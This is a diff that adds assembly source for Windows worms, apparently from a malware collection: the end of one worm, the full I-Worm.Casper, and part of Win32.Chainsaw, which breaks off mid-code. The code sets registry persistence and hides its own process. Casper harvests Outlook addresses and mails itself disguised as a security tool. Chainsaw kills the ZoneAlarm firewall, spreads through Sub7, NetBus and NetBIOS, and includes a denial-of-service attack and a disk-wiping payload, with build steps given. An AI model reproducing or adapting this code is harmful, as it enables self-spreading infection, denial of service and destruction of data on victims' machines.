+push offset sysDD +call GetSystemDirectoryA + +push offset sysDD +call SetCurrentDirectoryA + +push 500 +call Sleep + +push 1 +push offset sysD +call WinExec + +push dword ptr [mutexH] +call ReleaseMutex + +push 0h +call ExitProcess + + +@HANG_ALL_CONNECTIoNZ: + +push 500 ;timer +call Sleep + +push offset wininet_lib +call LoadLibraryA + +push offset hang_connection +push eax +call GetProcAddress +xchg eax,ecx + +push 0h ;kiss me goodbye ;) +push offset lpdwFlagz ;I don`t know that this WININET +call ecx ;function is working ;) Refer +call @HANG_ALL_CONNECTIoNZ ;to Jacob Navia it should be. + ;[*Nice 'WININET' Ref ;) Big Thx :*] +End Kakaroth +;================================================================================================ +; +1679 linez of asm c0de ;)) ? I did it ? he he ... +; +;================================================================================================ +;***** This is the end of your jurney... Sorry about commentz...i know - my english skillz. ***** +;================================================================================================ +; eEEEEEe nNn Nn dDDDd #+ +; EE NNnN nN Dd dD #+ +; EEEe nN nN nN dD dD #+ +; EE NN nN nN Dd dD #+ +; eEEEEEe nN nNNn dDDDd #+ +; #+ +; -= .: CoDinG is No7 a CrIm3 :. =- #+ +;================================================================================================ \ No newline at end of file diff --git a/Win32/I-Worm.Casper.asm b/Win32/I-Worm.Casper.asm new file mode 100644 index 00000000..c11ac415 --- /dev/null +++ b/Win32/I-Worm.Casper.asm @@ -0,0 +1,510 @@ +;--- dllz.def +IMPORTS + + WININET.InternetGetConnectedState + SHLWAPI.SHSetValueA +;--- + + +comment # +Name : I-Worm.Casper +Author : PetiK +Date : August 17th - August 24th +Size : 6144 byte (compressed with UPX tool) + +Action : Copy itself to + * WINDOWS\MsWinsock32.exe + Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value + * Winsock32 1.0 = WINDOWS\MsWinsock32.exe + + +To build the worm: +tasm32 /ml /m9 Casper +tlink32 -Tpe -c -x -aa Casper,,,import32,dllz +upx -9 Casper.exe + +To delete the worm: +del %windir%\MsWinsock32.exe +del %windir%\CasperEMail.txt + +dllz.def file: +IMPORTS + + WININET.InternetGetConnectedState + SHLWAPI.SHSetValueA + + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +DEBUT: +Main_Worm: + + call Hide_Worm + call Copy_Worm + call Check_Wsock + call Prepare_Spread_Worm + + Connected_: + push 00h + push offset Tmp + callx InternetGetConnectedState + dec eax + jnz Connected_ + + mov edi,offset casper_mail + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,"saC\" + stosd + mov eax,"Erep" + stosd + mov eax,"liaM" + stosd + mov eax,"txt." + stosd + xor eax,eax + stosd + + call Spread_Worm + +Hide_Worm proc + pushad + @pushsz "Kernel32.dll" + callx GetModuleHandleA + xchg eax,ecx + jecxz End_Hide + @pushsz "RegisterServiceProcess" + push ecx + callx GetProcAddress + xchg eax,ecx + jecxz End_Hide + push 1 + push 0 + call ecx + End_Hide: + popad + ret +Hide_Worm endp + +Check_Wsock proc + Search_Wsock: + push 50 + mov edi,offset wsock_file + push edi + callx GetSystemDirectoryA + add edi,eax + mov eax,"osW\" + stosd + mov eax,"23kc" + stosd + mov eax,"lld." + stosd + xor eax,eax + stosd + + push offset wsock_file + callx GetFileAttributesA + cmp eax,20h + jne End_Wsock + + xor eax,eax + push eax + push eax + push 03h + push eax + push eax + push 80000000h or 40000000h + push offset wsock_file + callx CreateFileA + mov wsckhdl,eax + + File_Mapping: + xor eax,eax + push eax + push eax + push eax + push 04h + push eax + push wsckhdl + callx CreateFileMappingA + test eax,eax + jz Close_File + mov wsckmap,eax + + xor eax,eax + push eax + push eax + push eax + push 06h + push wsckmap + callx MapViewOfFile + test eax,eax + jz Close_Map_File + mov esi,eax + mov wsckview,eax + + Old_Infect: + mov verif,0 + cmp word ptr [esi],"ZM" + jne UnmapView_File + cmp byte ptr [esi+12h],"z" + je Infected_By_Happy + cmp word ptr [esi+38h],"ll" + je Infected_By_Icecubes + jmp UnmapView_File + + Infected_By_Happy: + push 10h + push offset warning + @pushsz "I-Worm.Happy coded by Spanska" + push 00h + callx MessageBoxA + inc verif + jmp UnmapViewOfFile + Infected_By_Icecubes: + push 10h + push offset warning + @pushsz "I-Worm.Icecubes coded by f0re" + push 00h + callx MessageBoxA + inc verif + jmp UnmapViewOfFile + Already_Infected: + inc verif + jmp UnmapViewOfFile + + UnmapView_File: + push wsckview + callx UnmapViewOfFile + Close_Map_File: + push offset wsckmap + callx CloseHandle + Close_File: + push wsckhdl + callx CloseHandle + End_Wsock: + ret +Check_Wsock endp + +Copy_Worm proc + pushad + Original_Name: + push 50 + mov esi,offset original + push esi + push 0 + callx GetModuleFileNameA + + Copy_Name: + mov edi,offset copy_name + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,'WsM\' + stosd + mov eax,'osni' + stosd + mov eax,'23kc' + stosd + mov eax,'exe.' + stosd + pop edi + push 0 + push edi + push esi + callx CopyFileA + + Reg_Registered: + push 08h + push edi + push 01h + @pushsz "Winsock32" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + callx SHSetValueA + push 08h + @pushsz "PetiK - France - (c)2001" + push 01h + @pushsz "Author" + @pushsz "Software\CasperWorm" + push 80000001h + callx SHSetValueA + push 08h + @pushsz "1.00" + push 01h + @pushsz "Version" + @pushsz "Software\CasperWorm" + push 80000001h + callx SHSetValueA + popad + ret +Copy_Worm endp + + +Prepare_Spread_Worm proc + pushad + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + @pushsz "C:\CasperMail.vbs" + callx CreateFileA + xchg edi,eax + push 00h + push offset octets + push VBSSIZE + push offset vbsd + push edi + callx WriteFile + push edi + callx CloseHandle + push 1 + @pushsz "wscript C:\CasperMail.vbs" + callx WinExec + push 3 * 1000 + callx Sleep + @pushsz "C:\CasperMail.vbs" + callx DeleteFileA + popad + ret +Prepare_Spread_Worm endp + + Spread_Worm: + pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset casper_mail + callx CreateFileA + inc eax + test eax,eax + je End_Spread_worm + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + cmp eax,03h + jbe F3 + + call Scan_Mail + + F3: push esi + callx UnmapViewOfFile + F2: push ebp + callx CloseHandle + F1: push ebx + callx CloseHandle + End_Spread_worm: + popad + ret + + Scan_Mail: + pushad + xor edx,edx + mov edi,offset m_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,0dh + je entr1 + cmp al,0ah + je entr2 + cmp al,"#" + je f_mail + cmp al,"@" + je not_a + inc edx + not_a: stosb + jmp p_c + car_s: inc esi + jmp p_c + entr1: xor al,al + stosb + pop edi + test edx,edx + je Scan_Mail + call Send_Mail + jmp Scan_Mail + entr2: xor al,al + stosb + pop edi + jmp Scan_Mail + f_mail: + FIN: push 00h + callx ExitProcess + + Send_Mail: + xor eax,eax + push eax + push eax + push eax + push offset Message + push [MAPIHdl] + callx MAPISendMail + ret + + +.data +; ===== Main_Worm ===== +wsock_file db 50 dup (0) + +; ===== Check_Wsock ===== +wsckhdl dd 0 +wsckmap dd 0 +wsckview dd 0 +PEHeader dd 0 +warning db "Warning : You're infected by",00h +verif dd ? + +; ===== Copy_Worm ===== +original db 50 dup (0) +copy_name db 50 dup (0) + +; ===== Prepare_Spread_Worm ===== +octets dd ? + +; ===== Spread_Worm ===== +m_addr db 128 dup (?) +casper_mail db 50 dup (0) +mail_name db "Casper_Tool.exe",00h +MAPIHdl dd 0 +Tmp dd 0 + +subject db "Casper Tool Protect 1.00",00h +body db "Hi,",0dh,0ah + db "Look at this attachment...",0dh,0ah + db "This freeware alert you if you infected by " + db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah + db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah + db "The tool Casper v.1.00 scans this specific file and displays a message " + db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah + db 09h,09h,09h,"Good Bye and have a nice day",00h + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd ? + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset m_addr + dd offset m_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset original + dd offset mail_name + dd ? + +vbsd: +db 'On Error Resume Next',0dh,0ah +db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah +db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah +db 'c.Close',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'For O = 1 To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah +db 'c.WriteLine P.Address',0dh,0ah +db 'c.Close',0dh,0ah +db 'Next',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah +db 'c.WriteLine "#"',0dh,0ah +db 'c.Close',0dh,0ah +VBSSIZE = $-vbsd + +MAX_PATH equ 260 +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +Search WIN32_FIND_DATA <> + +end DEBUT +end \ No newline at end of file diff --git a/Win32/I-Worm.Chainsaw.asm b/Win32/I-Worm.Chainsaw.asm new file mode 100644 index 00000000..81c4151f --- /dev/null +++ b/Win32/I-Worm.Chainsaw.asm @@ -0,0 +1,1598 @@ + +[CHAINSAW.ASM] +; AVP description. +; --------------------------------------------------------------------------- +; Worm.Chainsaw +; +; This is a network worm with Internet spreading ability. When the worm +; is run on a system for the first time, it installs itself. To do that it +; copies itself to the Windows system directory using the filename +; WINMINE.EXE and also to the root directory of the current drive using the +; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set. +; The worm then registers itself in the system registry, auto-run key: +; +; HKCU\Software\Microsoft\Windows\CurrentVersion\Run +; Mines = path\WINMINE.EXE +; +; where "path" is the Windows system directory name. The worm then exits and +; triggers its infection routines when run during the next Windows startup. +; +; During the next Windows startup the worm is automatically executed by +; Windows by an auto-run key in the system registry. The worm then registers +; itself as hidden application and runs its spreading routine. That routine +; enumerates shared drives on the local networks [* It doesn't even get near +; local shares. *], gets the Windows directory on a drive (if there is one), +; copies itself to there using the filename CHAINSAW.EXE (if the drive is +; mapped for full access) and registers itself in there by writing the "Run=" +; instruction to the [windows] section of the WIN.INI file on the remote +; drive. During the next Windows restart the worm copy will be activated and +; will complete the infection. +; +; When the worm is started it sends a notifying message to the +; "alt.horror" conference. The message has the fields: +; +; From: "Leatherface" +; Subject: CHAINSAWED +; Newsgroups: alt.horror +; Message body: +; +; WHO WILL SURVIVE +; AND WHAT WILL BE LEFT OF THEM? +; +; The worm also tries to send its copies to remote machines. To do that it +; gets randomly selected IP addresses in an endless loop and tries to connect +; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan +; program on the remote machine (if the machine is infected by a backdoor +; program). After successfully connecting, the worm sends its copy to the +; remote machine and forces the Backdoor to execute it there. The list of +; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious +; that the worm has a very low chance to spread itself in such a way [* +; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread, +; and are currently in the wild in large numbers, try to explain me this +; then. *] +; +; Depending on the system date the worm also sends a "Deny-of-service" +; packet to a randomly selected IP address. That packet is prepared so that +; it may cause a remote Win9x machine to crash (because of a bug in Win9x +; libraries). The worm intends to do that on the 31th of the month, but +; because of a bug compares that value with "year" field, and as a result +; will bomb random selected machines only if tje system date is set to the +; year 0031 [* Oops! Well atleast this version has it fixed :*] +; +; The worm also disables the "ZoneAlarm" Internet protection utility. +; +; Depending on its random counter the worm spawns a trojan program that +; erases data on the hard drive by writing the text to there: +; +; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE +; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR +; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL +; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY +; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED +; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND +; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC +; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF +; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST +; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY, +; THE TEXAS CHAIN SAW MASSACRE..." +; --------------------------------------------------------------------------- + +;============================================================================ +; +; +; NAME: Win32.Chainsaw v1.01 +; TYPE: NetBios/SubSeven/NetBus worm. +; DATE: July - September 2000. +; AUTHOR: T-2000 / Immortal Riot. +; E-MAIL: T2000_@hotmail.com +; PAYLOAD: Sector trashing. +; +; FEATURES: +; +; - Disables ZoneAlarm firewall. +; - Not visible in 9x tasklist. +; - Sends usenet message on installation. +; - DoS'es random hosts on 31st of any month. +; - Anti-debugging code. +; +; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1, +; or NetBios, and then installs itself in the systems it can get access +; to. It's main payload is to IGMP DoS random Internet hosts on every 31st +; of the month, which will BSOD every released version of Windoze 95/98 +; that isn't patched or firewalled. +; +;============================================================================ + +; I've kept the code clear and understandable for everyone, no optimizations +; of any kind, mainly due the file alignment, the filesize will usually just +; stay the same wether your code is optimized or not. + + .386 + .MODEL FLAT + .DATA + + JUMPS + +; Converts a little indian word to a big indian word. +DWBI MACRO Lil_Indian + DW (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8) +ENDM + + +EXTRN WSAGetLastError:PROC +EXTRN ioctlsocket:PROC +EXTRN ExitProcess:PROC +EXTRN WSAStartup:PROC +EXTRN WritePrivateProfileStringA:PROC +EXTRN WSACleanup:PROC +EXTRN socket:PROC +EXTRN closesocket:PROC +EXTRN setsockopt:PROC +EXTRN InternetGetConnectedState:PROC +EXTRN DeleteFileA:PROC +EXTRN connect:PROC +EXTRN setsockopt:PROC +EXTRN PeekMessageA:PROC +EXTRN SetFileAttributesA:PROC +EXTRN GetSystemDirectoryA:PROC +EXTRN CreateFileA:PROC +EXTRN recv:PROC +EXTRN send:PROC +EXTRN sendto:PROC +EXTRN CloseHandle:PROC +EXTRN GetSystemTime:PROC +EXTRN GetModuleHandle +EXTRN RegOpenKeyExA:PROC +EXTRN RegSetValueExA:PROC +EXTRN RegCloseKey:PROC +EXTRN ReadFile:PROC +EXTRN CopyFileA:PROC +EXTRN WNetAddConnection2A:PROC +EXTRN WNetCancelConnection2A:PROC +EXTRN SetErrorMode:PROC +EXTRN GetModuleFileNameA:PROC +EXTRN FindWindowA:PROC +EXTRN PostMessageA:PROC +EXTRN GetTickCount:PROC +EXTRN WriteFile:PROC +EXTRN GetLocalTime:PROC +EXTRN WinExec:PROC +EXTRN select:PROC +EXTRN GetPrivateProfileStringA:PROC +EXTRN GetModuleHandleA:PROC +EXTRN GetProcAddress:PROC +EXTRN WNetAddConnection2A:PROC +EXTRN WNetEnumResourceA:PROC +EXTRN WNetOpenEnumA:PROC +EXTRN WNetCloseEnum:PROC +EXTRN RegQueryValueExA:PROC +EXTRN gethostbyname:PROC +EXTRN inet_ntoa:PROC + + +Worm_Size EQU 6144 + +SEM_NOGPFAULTERRORBOX EQU 00000002h +OPEN_EXISTING EQU 00000003h +CREATE_ALWAYS EQU 00000002h +SO_SNDTIMEO EQU 1005h +SO_RCVTIMEO EQU 1006h +RESOURCE_GLOBALNET EQU 00000002h +RESOURCEUSAGE_CONNECTABLE EQU 00000001h +RESOURCEUSAGE_CONTAINER EQU 00000002h +RESOURCEUSAGE_CONNECTABLE EQU 00000001h +RESOURCETYPE_DISK EQU 00000001h +SOL_SOCKET EQU 0FFFFh +HKEY_CURRENT_USER EQU 80000001h +KEY_QUERY_VALUE EQU 1 +KEY_WRITE EQU 00020006h +REG_SZ EQU 00000001h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h +FILE_SHARE_READ EQU 00000001h +FILE_ATTRIBUTE_HIDDEN EQU 2 +AF_INET EQU 2 +IPPROTO_IGMP EQU 2 +SOCK_STREAM EQU 1 +SOCK_RAW EQU 3 +FIONBIO EQU 8004667Eh +WM_QUIT EQU 0012h + + +S7_Upload_Req DB 'RTFChainsaw.exe' +End_S7_Upload_Req: + +S7_Upload_Size DB 'SFT046144' +End_S7_Upload_Size: + +S7_Exec_Req DB 'FMXChainsaw.exe' +End_S7_Exec_Req: + +NB_Password DB 'Password;1;netbus', 0Dh +End_NB_Password: + +NB_Upload_Req DB 'UploadFile;Chainsaw.exe;6144;\', 0Dh +End_NB_Upload_Req: + +NB_Exec_File DB 'StartApp;\Chainsaw.exe', 0Dh +End_NB_Exec_File: + +Nuke_File DB 'BBQ666.COM', 0 + +sz_Kernel32 DB 'KERNEL32', 0 +sz_RegServProc DB 'RegisterServiceProcess', 0 + +Win_Ini_Run_Key DB 'run', 0 +Windows_Section DB 'windows', 0 + +Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0 +ZoneAlarm_Window DB 'ZoneAlarm', 0 + +Reg_Handle_1 DD 0 +Reg_Handle_2 DD 0 +sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0 +Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\' +Account_Index DB '00000000', 0 +sz_Def_News_Acc DB 'Default News Account', 0 +sz_NNTP_Server DB 'NNTP Server', 0 + +Size_Acc_Buffer DD 9 +Size_NNTP_Buf DD 128 + +s_POST DB 'POST', 0Dh, 0Ah +s_QUIT DB 'QUIT', 0Dh, 0Ah + + ; Header. + +News_Message: DB 'From: "Leatherface" ', 0Dh, 0Ah + DB 'Subject: CHAINSAWED', 0Dh, 0Ah + DB 'Newsgroups: alt.horror', 0Dh, 0Ah + DB 0Dh, 0Ah + + ; Body. + + DB 'WHO WILL SURVIVE', 0Dh, 0Ah + DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah + + ; End-of-data command. + + DB '.', 0Dh, 0Ah +End_News_Message: + +MsDos_Sys DB 'T:\MSDOS.SYS', 0 +Win_Dir_Key DB 'WinDir', 0 +Paths_Section DB 'Paths', 0 + +Slash_Win_Ini DB '\' +Win_Ini DB 'WIN.INI', 0 + +Remote_Drive DB 'T:', 0 +Cover_Name DB '\WINMINE.EXE', 0 + +Remote_Trojan DB 'T:' +Root_Dropper DB '\Chainsaw.exe', 0 +Run_Key_Name DB 'Mines', 0 + +Boole_False DD 0 +Boole_True DD 1 + +NetBios_Remote DB '\\666.666.666.666', 0 + +Time_Out: DD 1 ; - Seconds. + DD 500 ; - Milliseconds. + +IO_Time_Out DD 5000 + +Usenet_Conn: DW AF_INET ; connect() structures. + DWBI 119 +Usenet_IP DD 0 + DB 8 DUP(0) + +Nuke_Conn: DW AF_INET + DW 0 +Nuke_IP DD 0 + DB 8 DUP(0) + +Sub7_Conn: DW AF_INET + DWBI 27374 +Sub7_IP DD 0 + DB 8 DUP(0) + +NetBus_Conn: DW AF_INET + DWBI 12345 +NetBus_IP DD 0 + DB 8 DUP(0) + +NetBus_Conn_2: DW AF_INET + DWBI (12345+1) +NetBus_IP_2 DD 0 + DB 8 DUP(0) + +NetBios_Conn: DW AF_INET + DWBI 139 +NetBios_IP DD 0 + DB 8 DUP(0) + +Win_Dir DB 260 DUP(0) +Default_String DB 0 + +Own_Path DB 260 DUP(0) + +Net_Struc_Count DD 1 +Enum_Buf_Size DD 666 +Enum_Buffer DB 666 DUP(0) + +Net_Resource_Struc: + + DD 0 + DD 0 + DD 0 + DD 0 + DD 0 + DD OFFSET NetBios_Remote + DD 0 + DD 0 + +Net_Resource: DD 0 + DD 0 + DD 0 +Net_Usage DD 0 +Net_Local_Name DD 0 +Net_Remote_Name DD 0 + DD 0 + DD 0 + +Select_Struc: +Sock_Count DD 3 +Sub7_Socket DD 0 +NetBus_Socket DD 0 +NetBios_Socket DD 0 + +IGMP_Socket DD 0 +News_Socket DD 0 +NetBus_Socket_2 DD 0 + +Connect_Select: DD 4 DUP(0) + +IGMP_Nuke DB 15000 DUP(0) + +Temp DD 0 +Random_Init DD 0 + +Enum_Handle DD 0 + +Size_Cover_Path DD 0 + +System_Time DW 8 DUP(0) + +Worm_Code DB Worm_Size DUP(0) +WSA_Data DB 400 DUP(0) +System_Dir DB 260 DUP(0) +NNTP_Server DB 128 DUP(0) +Buffer DB 512 DUP(0) + + .CODE + + DB '[-T2IR-]', 0 +START: + PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out + CALL SetErrorMode ; without displaying shit. + + PUSH 0 ; Fake a dispatch to get the + PUSH 0 ; hourglass cursor to + PUSH 0 ; disappear. + PUSH 0 + PUSH 0 + CALL PeekMessageA + + ; Get offset of CreateFileA in the jump table. + + MOV ESI, DWORD PTR CreateFileA+2 + LODSD + + ; Soft-Ice's BPX command works with 0CCh breakpoints + ; to hook API's, so here we simply check if a common + ; API has been hooked and kill the system if true. + ; For a virus it's better to check every fetched API + ; for a debugger hook. + + CMP BYTE PTR [ESI], 0CCh ; Debugger has a hook on it? + JE Payload + + CALL GetTickCount + + MOV Random_Init, EAX + + PUSH 260 ; Get the path to ourself. + PUSH OFFSET Own_Path + PUSH 0 + CALL GetModuleFileNameA + + MOV EDI, OFFSET System_Dir + + PUSH 260 ; Get the System directory. + PUSH EDI + CALL GetSystemDirectoryA + + MOV ESI, OFFSET Cover_Name + ADD EDI, EAX + + MOVSD ; Append our cover name + MOVSD ; \WINMINE.EXE to it. + MOVSD + MOVSB + + SUB EDI, OFFSET System_Dir ; Save size of path. + MOV Size_Cover_Path, EDI + + PUSH 1 ; Copy us to the system + PUSH OFFSET System_Dir ; directory under the cover + PUSH OFFSET Own_Path ; name. + CALL CopyFileA + + XCHG ECX, EAX ; Virus is already installed? + JECXZ Check_Trigger + + PUSH 1 ; Copy root dropper to root + PUSH OFFSET Root_Dropper ; to indicate this is the 1st + PUSH OFFSET Own_Path ; run of the worm. + CALL CopyFileA + + PUSH FILE_ATTRIBUTE_HIDDEN ; Hide it. + PUSH OFFSET Root_Dropper + CALL SetFileAttributesA + + PUSH OFFSET Reg_Handle_1 ; Open up a handle to the + PUSH KEY_WRITE ; registry Run key. + PUSH 0 + PUSH OFFSET Run_Key + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + PUSH Size_Cover_Path ; Make the cover file run + PUSH OFFSET System_Dir ; every bootup. + PUSH REG_SZ + PUSH 0 + PUSH OFFSET Run_Key_Name + PUSH Reg_Handle_1 + CALL RegSetValueExA + + PUSH Reg_Handle_1 ; Close registry key. + CALL RegCloseKey + + PUSH OFFSET Win_Ini ; Remove temporary reference + PUSH 0 ; to virus dropper in + PUSH OFFSET Win_Ini_Run_Key ; WIN.INI. + PUSH OFFSET Windows_Section + CALL WritePrivateProfileStringA + +Exit: PUSH 0 + CALL ExitProcess + +Check_Trigger: MOV EAX, 666 ; 1/666 chance of activating. + CALL Random_EAX + + DEC EAX ; Today is trashday? + JZ Payload + + PUSH 0 ; Open ourselves. + PUSH 0 + PUSH OPEN_EXISTING + PUSH 0 + PUSH FILE_SHARE_READ + PUSH GENERIC_READ + PUSH OFFSET Own_Path + CALL CreateFileA + + MOV EBX, EAX + + INC EAX + JZ Exit + + PUSH 0 ; Read in ourselves. + PUSH OFFSET Temp + PUSH Worm_Size+1 + PUSH OFFSET Worm_Code + PUSH EBX + CALL ReadFile + + CMP Temp, Worm_Size ; Wormsize has changed? + JNE Payload ; Then we're likely + ; incomplete or infected + ; with a virus. + + PUSH EBX ; Close ourselves again. + CALL CloseHandle + + PUSH OFFSET sz_Kernel32 ; Get base of KERNEL32.DLL. + CALL GetModuleHandleA + + PUSH OFFSET sz_RegServProc ; Get RegisterServiceProcess. + PUSH EAX + CALL GetProcAddress + + XCHG ECX, EAX + JECXZ Init_Winsock + + PUSH 1 ; Register our process as a + PUSH 0 ; hidden service. + CALL ECX + +Init_Winsock: PUSH OFFSET WSA_Data ; Initialize winsock. + PUSH 0202h + CALL WSAStartup + + OR EAX, EAX ; Error? + JNZ Exit + +Chk_Inet_State: PUSH 0 ; We're connected to the + PUSH OFFSET Temp ; Internet? + CALL InternetGetConnectedState + + DEC EAX ; Else just loop and check + JNZ Chk_Inet_State ; again until we are. + + ; Here we close the ZoneAlarm firewall if it is + ; found active, reason being that A) it will pop-up + ; a warning box whenever a program (ie. our worm) + ; is attempting to access the Internet, (this is how + ; many RAT trojans get caught these days) and B) it + ; is likely to block our ports. + + PUSH OFFSET ZoneAlarm_Window ; Attempt to locate the + PUSH 0 ; ZoneAlarm window. + CALL FindWindowA + + XCHG ECX, EAX + JECXZ Check_1st_Run + + PUSH 0 ; Tell ZoneAlarm to quit. + PUSH 0 + PUSH WM_QUIT + PUSH ECX + CALL PostMessageA + +Check_1st_Run: PUSH OFFSET Root_Dropper ; Can we delete the root + CALL DeleteFileA ; dropper? + + XCHG ECX, EAX + JECXZ Do_Random_IP + + ; This is the first Internet run of the worm, so + ; send a usenet message to alt.horror to note + ; our presence. Better to just use a public + ; dump place instead of e-mail for example, this + ; way they can't track you or kill the account. + + PUSH OFFSET Reg_Handle_1 ; Open a handle to Internet + PUSH KEY_QUERY_VALUE ; Account Manager. + PUSH 0 + PUSH OFFSET sz_Account_Mgr + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + OR EAX, EAX + JNZ Do_Random_IP + + PUSH OFFSET Size_Acc_Buffer ; Get default news account. + PUSH OFFSET Account_Index + PUSH 0 + PUSH 0 + PUSH OFFSET sz_Def_News_Acc + PUSH Reg_Handle_1 + CALL RegQueryValueExA + + OR EAX, EAX + JNZ Close_Reg_1 + + PUSH OFFSET Reg_Handle_2 ; Open the default news + PUSH KEY_QUERY_VALUE ; account. + PUSH 0 + PUSH OFFSET Account_Key + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + OR EAX, EAX + JNZ Close_Reg_1 + + PUSH OFFSET Size_NNTP_Buf ; Get it's NNTP server. + PUSH OFFSET NNTP_Server + PUSH 0 + PUSH 0 + PUSH OFFSET sz_NNTP_Server + PUSH Reg_Handle_2 + CALL RegQueryValueExA + + OR EAX, EAX + JNZ Close_Reg_2 + + PUSH OFFSET NNTP_Server ; Convert the DNS-name to + CALL gethostbyname ; an IP-address. + + XCHG ECX, EAX + JECXZ Close_Reg_2 + + MOV ESI, [ECX+12] ; Fetch IP-address. + LODSD + PUSH DWORD PTR [EAX] + POP Usenet_IP + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV News_Socket, EAX + + INC EAX ; Error? + JZ Close_Reg_2 + + MOV EBX, News_Socket + CALL Set_Time_Outs + + PUSH 16 + PUSH OFFSET Usenet_Conn + PUSH News_Socket + CALL connect + + INC EAX + JZ Close_Reg_2 + + MOV EDI, OFFSET Buffer + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + + CMP BYTE PTR [EDI], '2' + JNE Send_QUIT + + PUSH 0 + PUSH 6 + PUSH OFFSET s_POST + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + + CMP BYTE PTR [EDI], '3' + JNE Send_QUIT + + PUSH 0 + PUSH (End_News_Message-News_Message) + PUSH OFFSET News_Message + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + +Send_QUIT: PUSH 0 + PUSH 6 + PUSH OFFSET s_QUIT + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + +Close_News: PUSH News_Socket + CALL closesocket + +Close_Reg_2: PUSH Reg_Handle_2 + CALL RegCloseKey + +Close_Reg_1: PUSH Reg_Handle_1 + CALL RegCloseKey + +Do_Random_IP: CALL Random_AL_254 ; Get random octet (1-254). + + XCHG EBX, EAX + + CALL Random_AL_254 ; Another one. + + SHL EBX, 8 + MOV BL, AL + + CALL Random_AL_254 ; And another one. + + SHL EBX, 8 + MOV BL, AL + +Rand_A_Class: MOV AL, 223 ; Random A/B/C class IP. + CALL Random_AL + + CMP AL, 10 ; Private network segment. + JE Rand_A_Class + + CMP AL, 127 ; 